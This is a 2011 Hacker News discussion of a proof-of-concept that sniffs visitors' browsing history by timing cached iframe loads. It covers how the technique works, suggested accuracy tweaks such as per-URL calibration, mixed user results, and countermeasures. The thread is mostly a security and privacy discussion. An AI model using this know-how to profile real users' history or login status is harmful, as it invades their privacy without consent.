Hacker News new | past | comments | ask | show | jobs | submit login
I know the websites you visited (coredump.cx)
84 points by ksri on Dec 3, 2011 | hide | past | web | favorite | 46 comments

Thanks for all the insightful comments about how this "didn't work for you" or "I'm paranoid so I survived this"?

It works. It works enough of the time and on enough browsers to be very relevant to anyone who cares about the privacy/security of internet users at large.

This is an impressive proof of concept, and an important thing to be discussing, yeah?

[EDIT] To clarify, I tested this on Firefox 8.0.1 on my 2011 iMac with Lion and it worked flawlessly one by one as I visited the sites "Facebook, Reddit, Flickr", they turned from gray to green in each subsequent test.

I don't know if it's accurate enough to be a concern. What could an attacker do with such information that is so scary? They could publish "IP address X has been to Y, Z, and W recently", or they could use it to target ads, I guess, but it doesn't seem like it's reliable enough to cause any serious harm. You could just say, "Um, no I haven't" if it becomes an issue.

It did correctly detect some sites for me, but it gave one false positive and three false negatives. With that kind of error rate I just don't see it being taken seriously in anything that matters.

You are a sample size of 1.

Read the rest of the comments here. Everyone else is having similar problems. Also, please spare me the expected "This is all anecdotal/sample size of 30" follow-up. Perhaps you can answer the real question -- is this valuable to anyone if it has a significant error margin? I think it wouldn't be allowed a margin of more than 1% if it were to be useful, and even that is kind of pushing it if you intend to do anything important with the data -- if 20 sites are tested per visitor, a 1% error rate would mean that an incorrect detection would occur every fifth visitor or so. That's enough to allow plausible deniability in my book.

FWIW, I added several improvements, and according to the built-in survey, it works for about 95% of all visitors. If you had bad results initially, clear you cache and give it a second try.

Exactly. Its a matter of spending a few hours per browser to perfect it. For all we know, someone may already have perfected it and could be using this in the wild.

Very simple summary of the technique:

To test if a user has recently visited Facebook, see how long it takes for the Facebook logo to load when called from your own page. If it's relatively fast, you can assume the image has been cached by the user's browser ... meaning the user has recently visited Facebook. If it's relatively slow, you can assume no cached version of the logo is available, so the user probably hasn't visited Facebook recently.

Results are fuzzy because "relatively fast" and "relatively slow" are not precise.

Author here. It's not exactly that; the <img> approach is commonly suggested, but it has some serious limitations (explained in the source code).

Instead, I time <iframe>s, which allows SOP violations to be trapped the moment the browser barely starts thinking about rendering the target page. The other benefit is that <iframe> requests can be aborted quite easily when they are taking long enough for us to suspect cache miss - before the request is completed and cached.

The results should not be fuzzy, although the PoC uses hardcoded timings instead of doing calibration, which makes it a bit tricky with "outlier" clients (very fast or very slow).

I made some minor tweaks today, and the success rate should be greatly improved; there's now a mini-survey on the page, looks like ~90% of the people who bother to complete it are getting accurate results.

Seems like a good way to calibrate is to have the client cache a file from your targets list (you can cachebust by adding "?some_random_junk" at the end). Then, see how long it takes to get a hit.

Better yet, do this for each target URL. Knowing the time that a miss takes vs. a hit will greatly increase your accuracy.

If it loads the page in an iframe, wouldn't future loads give a false positive?

Also, does this work for Google+ (I don't have an account)? I'd be surprised if it did, since it uses X-Frame-Options.

If you allow the load to complete, yes. But the idea here is to very quickly decide that you're not getting a cached copy, and abort the request (by changing src=) before the browser has a chance to read anything back and figure out what to do with it.

It is missing some sites which have https-everywhere rules. Still a scary thing; looking at the comments in the source, would coalescing load events deter the attack, or at least make it probabilistic and slow? And why isn't Firefox displaying requests to the sniffed sites while it attempts to access them? The request is already issued, even if the script manages to abort it before it completes.

Let's hope it doesn't attract the typical browser developers' slapdash response of "let's fix this by breaking the DOM," as happened with the :visited trick.

Seemed like they fixed :visited as best they could. What would you have done?

I accidentally fireproofed myself against this attack. I have the Web Developer extension installed and I forgot I had the Disable Cache option on.(The script works as advertised with it off.) Not really practical solution if you want pages to load fast.

The conventional wisdom is that you need web cache for a fast browsing experience. I disabled mine completely a few months ago and cant tell the difference under normal usage. Try it, you'll be surprised.

As it turns out, I'm one of the minority of users who keep NoScript in paranoid mode until I really want to see something supplied by JS -- and then I'm likely to only give temporary permission and turn that off when I'm done.

Obviously, this didn't work against me.

Same here. I enabled it after reading the code and it detected Facebook and G+. The latter is possible (links from HN), but I never go to the former. It also failed to detect some of the others.

Why the need for a "sub-ms" timer implementation? Just do a while loop and constantly check for the SOP exception (or for Xms to have elapsed). Set a timeout between checking URLs. The ~10ms blocking of each URL check will not be noticeable to the UI.

Nice PoC though, and thanks for the lack of press release ;)

Edit: I just tried this out and it appears that the looping JS blocks the iframe from loading. I would have figured the iframe would be a separate JS thread. I'm wondering -- do all iframes share the same JS thread? Can one iframe block another? Anyway, it's clear that some sort of asynchronous solution is necessary.

Chiefly because if you have a fast machine, good connection, and a nearby CDN node, ~10 ms may be enough to establish a connection, make a request,and see the response.

Plus, if you do setInterval(..., 1) and then measure new Date().getTime() deltas, you will probably see that even if the browser isn't doing anything taxing, you get 100 ms or more every now and then...

I'm assuming there is someone working on JavaScript-RT as we speak, though ;-)

It reports completely bogus entries for me, which I never visit:

     Blogger - admin
     Google search (UK)
These are besides entries like Wikipedia, Google, Facebook, Youtube, LinkedIn, Reddit - which most other people here are visiting.

If this is based on actual info taken from :visited selectors, apparently they are useless (maybe these are reported because of banners or scripts loaded from those sites or something?) and one could do a better job by just faking it.

If this is based on actual info taken from :visited selectors, apparently they are useless

It's not, it's based on trying to load some URL from the website and measuring the time it takes. If you went there, it should be on the cache and take much less time to load.

It doesn't seem to work that well, though.

If this is based on actual info taken from :visited selectors

Nope, that security hole was patched already. https://blog.mozilla.com/security/2010/03/31/plugging-the-cs...

People may be using it wrong. My browser cache clears every exit (likely for most people at HN). I had a new session going so it didn't detect where i went because there was no history. When i went on facebook and tried it again, facebook showed up. So the attack does work in some cases.

The one good thing that could come out of this is that websites with the gianto bar of "follow me/like me" icons could be different sized based on if you detect that the user has went to certain social media site.

Clearing your cache between sessions is not good enough. Just disable your cache altogether. It works better than you'd expect.

it detected some sites ive never been to (arent in history) oddly. they dont seem in cache or via adverts either. some others i went to were detected, but..

Maybe you just have a really fast internet connection?

The webtiming paper provides more information on this form of attack - http://sip.cs.princeton.edu/pub/webtiming.pdf

The summary of the paper makes me sad - > We are not aware of any practical countermeasures to these attacks. There seems to be little hope that effective countermeasures will be developed and deployed any time soon.

The countermeasure is trivial: single-origin policy or origin managmment for cache access. At a slightly expense of slower browsing when visiting evil websites.

Countermeasures don't appear to be all that necessary, if the attack itself is ineffective. The results seem to be quite random, placing me at sites I've never been on and not noticing ones that I do visit regularly, such as Twitter and Facebook.

Install RequestPolicy. It fixes this problem and many many more.

Didn't work in Firefox 8.0.1

I'm getting almost random results in FF8. It differs quite a lot when comparing multiple runs.

I'm more surprised that it thinks that I've logged into blogger (which I've never done on this computer) than that it misses my one-page visit to reddit about a week ago. And on the next round the results are reversed.

Try the original: http://lcamtuf.coredump.cx/cachetime/orig.html

It worked for me on Chrome. The one linked now gives some weird entries.

Still doesn't push through noscript.

Very random results. I used this on Firefox (beta nightly) and on a fresh start got no entries. When I opened Facebook in another tab then quickly ran again, it said I had gone to Facebook, Twitter and Blogger. When I retried, just Facebook. It also said I went to almost all the eCommerce websites without me having visited any.

The firefox version from the tor browser bundle does not seem to be vulnerable to this attack.

Of course. It shouldn't be caching anything to disk.

Or even RAM?

I have largely varying results in FF9.

The idea is interesting but, considering that the performance of the client (-box) can affect the results, it doesn't feel very viable.

What about DNS cache probing? Is it possible? I guess it will suffer from similar results but at smaller scale.

The old script works better form me. Less false positives and rather stable results.

It got just youtube right for me. Considering the websites it's saying you might have visited, there's a high probability of getting at least some right because a large population on the internet visit those sites. Looks bogus to me!

just give it a try: I visited none of these websites before checking, it got it right, then I opened Amazon, Twitter, ... and they were detected perfectly!

I opened twitter. And now it thinks I visited youtube for some reason :-/

This is on Firefox 8.0 on Fedora Linux. Maybe the OS has a lot to do with the success rate?

Edit: I just read through the technique now and there's no way it could depend on the OS. Anyway, this is way too inaccurate to be of any practical use.

just a precision, I'm on Archlinux (up to date) / Firefox 8.0

You can also use the same method (or similar) to check if a user is logged-in in any 3d party websites.

Applications are open for YC Summer 2019

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact